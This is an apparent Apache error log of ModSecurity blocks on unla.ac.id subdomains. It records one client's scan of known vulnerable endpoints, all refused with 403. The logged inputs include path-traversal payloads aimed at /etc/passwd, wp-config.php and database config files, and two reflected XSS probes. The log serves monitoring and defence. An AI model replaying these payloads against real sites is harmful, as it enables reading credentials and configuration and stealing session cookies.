[Tue Aug 29 11:38:35.363795 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAARiDxoAAAAJ"]
[Tue Aug 29 11:38:35.365338 2023] [:error] [pid 1547] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAYLYbUAAAAQ"]
[Tue Aug 29 11:38:35.365347 2023] [:error] [pid 1528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAX4pmEAAAAF"]
[Tue Aug 29 11:38:35.368963 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAXm8AYAAAAW"]
[Tue Aug 29 11:38:35.397107 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAYIYhgAAAAM"]
[Tue Aug 29 11:38:44.425040 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12VMCo-f0AAAYIYi4AAAAM"]
[Tue Aug 29 11:38:45.365900 2023] [:error] [pid 1565] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12VcCo-f0AAAYdUekAAAAQ"]
[Tue Aug 29 11:38:46.367807 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAXYiMIAAAAG"]
[Tue Aug 29 11:38:46.372909 2023] [:error] [pid 1546] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYKOSsAAAAP"]
[Tue Aug 29 11:38:46.379577 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAXm8CgAAAAW"]
[Tue Aug 29 11:38:46.385162 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAXxYRIAAAAh"]
[Tue Aug 29 11:38:46.409928 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12VsCo-f0AAAXYiMQAAAAG"]
[Tue Aug 29 11:38:46.419161 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYIYjIAAAAM"]
[Tue Aug 29 11:38:47.358819 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAXm8CsAAAAW"]
[Tue Aug 29 11:38:47.363516 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAXJ6g0AAAAX"]
[Tue Aug 29 11:38:47.365212 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYb5sAAAAAI"]
[Tue Aug 29 11:38:47.395102 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYelUUAAAAV"]
[Tue Aug 29 11:38:47.395452 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAXbb8AAAAAL"]
[Tue Aug 29 11:38:47.397113 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAUFduoAAAA9"]
[Tue Aug 29 11:38:47.402426 2023] [:error] [pid 1546] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYKOS4AAAAP"]
[Tue Aug 29 11:38:47.407995 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYIYjUAAAAM"]
[Tue Aug 29 11:38:47.415114 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYculoAAAAN"]
[Tue Aug 29 11:38:47.415806 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYelUYAAAAV"]
[Tue Aug 29 11:38:56.357283 2023] [:error] [pid 1576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYo0yUAAAAZ"]
[Tue Aug 29 11:38:56.373524 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYcunMAAAAN"]
[Tue Aug 29 11:38:56.383670 2023] [:error] [pid 1574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYmldgAAAAQ"]
[Tue Aug 29 11:38:56.460374 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYcunYAAAAN"]
[Tue Aug 29 11:38:56.462097 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYIYk4AAAAM"]
[Tue Aug 29 11:38:56.552206 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12YMCo-f0AAAYIYk8AAAAM"]
[Tue Aug 29 11:38:57.359459 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYelWQAAAAV"]
[Tue Aug 29 11:38:57.359485 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAXVyvMAAAAB"]
[Tue Aug 29 11:38:57.365812 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAV1EewAAAAd"]
[Tue Aug 29 11:38:57.366059 2023] [:error] [pid 1574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12YcCo-f0AAAYmldoAAAAQ"]
[Tue Aug 29 11:38:57.370759 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYWXY4AAAAF"]
[Tue Aug 29 11:38:57.376603 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYh9Q8AAAAK"]
[Tue Aug 29 11:38:57.381607 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAXYiOcAAAAG"]
[Tue Aug 29 11:38:57.384559 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12YcCo-f0AAAXbb9cAAAAL"]
[Tue Aug 29 11:38:57.384984 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAARiD2EAAAAJ"]
[Tue Aug 29 11:38:57.400956 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAXJ6ioAAAAX"]
[Tue Aug 29 11:38:57.404568 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAXbb9gAAAAL"]
[Tue Aug 29 11:38:57.405606 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAXxYTIAAAAh"]
[Tue Aug 29 11:39:05.032703 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12acCo-f0AAAYWXasAAAAF"]
